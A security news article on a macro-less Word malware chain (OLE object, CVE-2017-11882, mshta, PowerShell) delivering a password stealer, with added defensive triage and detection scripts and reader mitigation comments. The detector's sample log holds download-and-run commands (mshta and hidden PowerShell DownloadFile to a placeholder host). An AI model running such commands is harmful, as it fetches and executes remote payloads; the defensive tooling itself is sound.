
Spam distributors are using a new technique to infect users with malware, and while this attack relies on having users open Word documents, it does not involve users having to allow the execution of macro scripts.
This new macro-less technique is currently under active exploitation: Trustwave SpiderLabs researchers detected it in an ongoing malware campaign.
The company says crooks are using this multi-phase, no-macros technique to infect users with a password stealer. Currently, evidence suggests only one group is using this novel trick, albeit it will surely be adopted by others.
New technique's exploitation chain
The actual exploitation chain is detailed below and relies on several file formats and scripting technologies: DOCX, RTF, HTA, VBScript, and PowerShell.
⏩ Victim downloads and opens the DOCX file.
⏩ DOCX file contains an embedded OLE object.
⏩ OLE object downloads and opens an RTF (disguised as a DOC) file.
⏩ DOC file uses CVE-2017-11882 Office Equation Editor vulnerability.
⏩ Exploit code runs an MSHTA command line.
⏩ MSHTA command line downloads and runs an HTA file.
⏩ HTA file contains a VBScript that unpacks a PowerShell script.
⏩ PowerShell script downloads and installs the password stealer.
⏩ Malware steals passwords from browsers, email and FTP clients.
⏩ Malware uploads data to a remote server.
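The first two links of the chain (a DOCX carrying an OLE object that reaches out for an RTF) leave traces inside the document package itself, which is just a ZIP of XML parts. The following is an added triage script, not Trustwave's tooling or anything from the report: it opens a .docx, lists any parts under word/embeddings/, counts relationships of the OLE-object type, and reports any relationship whose target is an external URL. The sample document it builds is constructed for this example; that the malicious object is a linked (rather than embedded) OLE object with ProgID Word.Document.8 is an assumption made here, since the article does not say how the object is wired up.

```python
"""Static triage of a .docx for OLE objects that could start a chain like the one above.

Added example. The DOCX is read as the ZIP package it is; findings are
(a) embedded OLE parts under word/embeddings/, (b) oleObject-type relationships,
(c) relationships marked TargetMode="External" whose target is a URL.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"


def triage_docx(data: bytes) -> dict:
    """Summarise OLE-related content in a DOCX given as bytes."""
    findings = {"embedded_parts": [], "ole_relationships": 0, "external_targets": []}
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            if name.startswith("word/embeddings/"):
                findings["embedded_parts"].append(name)
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                if rel.get("Type") == OLE_REL:
                    findings["ole_relationships"] += 1
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and target.lower().startswith(("http://", "https://")):
                    findings["external_targets"].append((name, target))
    return findings


def is_suspicious(findings: dict) -> bool:
    """Any OLE object or external URL target deserves a closer look before the file is opened."""
    return bool(findings["embedded_parts"] or findings["ole_relationships"] or findings["external_targets"])


def build_sample_docx(with_ole: bool) -> bytes:
    """Constructed minimal DOCX (not a real sample). With with_ole=True it carries a linked OLE
    object whose relationship points at a remote file, mirroring the 'OLE object downloads
    an RTF' step; the ProgID and link form are assumptions for this example."""
    rels = ['<?xml version="1.0" encoding="UTF-8"?>', '<Relationships xmlns="%s">' % RELS_NS]
    body = "<w:p><w:r><w:t>Statement of account</w:t></w:r></w:p>"
    if with_ole:
        rels.append('<Relationship Id="rId5" Type="%s" Target="http://example.invalid/statement.doc" '
                    'TargetMode="External"/>' % OLE_REL)
        body += ('<w:p><w:r><w:object><o:OLEObject Type="Link" ProgID="Word.Document.8" '
                 'r:id="rId5" UpdateMode="Always"/></w:object></w:r></w:p>')
    rels.append("</Relationships>")
    doc = ('<?xml version="1.0" encoding="UTF-8"?>'
           '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
           'xmlns:o="urn:schemas-microsoft-com:office:office" '
           'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
           "<w:body>%s</w:body></w:document>" % body)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml",
                     '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        pkg.writestr("_rels/.rels", '<?xml version="1.0"?><Relationships xmlns="%s"/>' % RELS_NS)
        pkg.writestr("word/document.xml", doc)
        pkg.writestr("word/_rels/document.xml.rels", "".join(rels))
    return buf.getvalue()


if __name__ == "__main__":
    for label, flag in (("clean", False), ("ole-link", True)):
        result = triage_docx(build_sample_docx(flag))
        print(label, "suspicious" if is_suspicious(result) else "clean", result)
```

Run against a real attachment with `triage_docx(open("file.docx", "rb").read())`. The check is deliberately coarse: a legitimate document can carry OLE objects too, so treat a hit as a reason to sandbox or hold the file rather than as proof of compromise.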

Trustwave says it has seen this trick used with malicious documents arriving via emails with the following subject lines, although these will likely change by tomorrow or next week.
TNT STATEMENT OF ACCOUNT – {random numbers}...............
Request for Quotation (RFQ) - < {random numbers} >
Telex Transfer Notification
SWIFT COPY FOR BALANCE PAYMENT
The only way to stay safe is for users to break this new technique's exploitation chain somewhere. The easiest way to do that is to keep Windows and Office up to date.
Microsoft's January 2018 Patch Tuesday security updates included a patch that removed part of the Equation Editor's functionality in order to mitigate CVE-2017-11882.
IOCs are available in the Trustwave report detailing this new attack.
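Patching removes the Equation Editor link, but the later links of the chain (mshta fetching an HTA, the HTA starting PowerShell, PowerShell downloading the stealer) are also visible to anyone logging process creation. The script below is an added example, not part of the article or of Trustwave's report: it parses constructed process-creation events in an assumed "parent_image|image|command_line" format and flags each stage. The process names (EQNEDT32.EXE for the Equation Editor, mshta.exe, powershell.exe) and the parent/child pairs are inferred from the chain described above, and the paths and URLs in the sample lines are placeholders, not IoCs.

```python
"""Spot the macro-less chain's process lineage in process-creation events.

Added example. Event lines are constructed in an assumed
"parent_image|image|command_line" format; the process names and parent/child
pairs are inferred from the chain in the article (Equation Editor runs mshta,
mshta fetches an HTA, the HTA starts PowerShell, PowerShell downloads the payload).
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    parent: str   # parent process image path
    image: str    # created process image path
    cmdline: str  # command line of the created process


def parse_event(line: str) -> ProcEvent:
    """Parse one assumed-format log line; the command line may itself contain '|'."""
    parent, image, cmdline = line.split("|", 2)
    return ProcEvent(parent.strip(), image.strip(), cmdline.strip())


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


URL_RE = re.compile(r"https?://", re.IGNORECASE)
PS_DOWNLOAD_RE = re.compile(r"download(string|file)|invoke-webrequest|net\.webclient", re.IGNORECASE)


def detect(ev: ProcEvent) -> List[str]:
    """Return the names of every chain stage an event matches (empty list if none)."""
    parent, child = basename(ev.parent), basename(ev.image)
    hits = []
    if parent == "eqnedt32.exe" and child == "mshta.exe":
        hits.append("equation-editor-spawns-mshta")   # Equation Editor exploit stage
    if child == "mshta.exe" and URL_RE.search(ev.cmdline):
        hits.append("mshta-remote-hta")               # HTA fetched from a URL
    if parent == "mshta.exe" and child == "powershell.exe":
        hits.append("hta-launches-powershell")        # VBScript in the HTA unpacks PowerShell
    if child == "powershell.exe" and PS_DOWNLOAD_RE.search(ev.cmdline):
        hits.append("powershell-download")            # final payload retrieval
    return hits


def scan(lines: List[str]) -> Dict[int, List[str]]:
    """Map line index -> matched stages, for every line that matched at least one."""
    results = {}
    for i, line in enumerate(lines):
        hits = detect(parse_event(line))
        if hits:
            results[i] = hits
    return results


def chain_observed(results: Dict[int, List[str]]) -> bool:
    """True when both the mshta stage and the PowerShell stage were seen in the same batch."""
    stages = {h for hits in results.values() for h in hits}
    return "mshta-remote-hta" in stages and "hta-launches-powershell" in stages


# Constructed sample events (paths and URLs are placeholders, not real IoCs)
SAMPLE_LOG = [
    r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE|C:\Windows\splwow64.exe|splwow64.exe 12288",
    r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE|C:\Windows\System32\mshta.exe|mshta http://example.invalid/stage.hta",
    r"C:\Windows\System32\mshta.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden (New-Object Net.WebClient).DownloadFile('http://example.invalid/s.exe','%TEMP%\s.exe')",
    r"C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe readme.txt",
]

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for idx, hits in found.items():
        print(idx, hits)
    print("chain observed:", chain_observed(found))
```

Each rule on its own would be noisy in some environments (administrators do run PowerShell with download cmdlets); the value is in the lineage, which is why `chain_observed` only fires when the mshta and PowerShell stages appear together.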
Comments
tomthegeek - 6 years ago
We have macros locked down naturally (yes, I know it doesn't use macros). But we also have some SRPs in effect which prohibit programs from firing up from %temp% directories. I'm wondering if that would help mitigate this threat, because most of my users love to view or open a doc straight from the email itself. (At least with Office 2010) those would be from a %temp% directory. Do you know if the SRP would help in this situation?
JohnnyJammer - 6 years ago
"We have macros locked down naturally (yes, I know it doesn't use macros). But we also have some SRPs in effect which prohibit programs from firing up from %temp% directories. I'm wondering if that would help mitigate this threat, because most of my users love to view or open a doc straight from the email itself. (At least with Office 2010) those would be from a %temp% directory. Do you know if the SRP would help in this situation?"
That won't stop it mate, you are halfway there but this doesn't use a macro. Best thing to do is what I have already done a long time ago: disable scripting using NoScript, create a GPO to make sure that vbs, hta, ace, jse, js, wsh, wsf, vbe all open in Notepad so that way they cannot execute.
Then like you have done, disallow all those file extensions again from running in %TMP%\*.*\ and also .exe files etc etc.
Ensure no user has admin access both local and domain. Then sit back and laugh at all these trojans trying to get access and only open in notepad lol.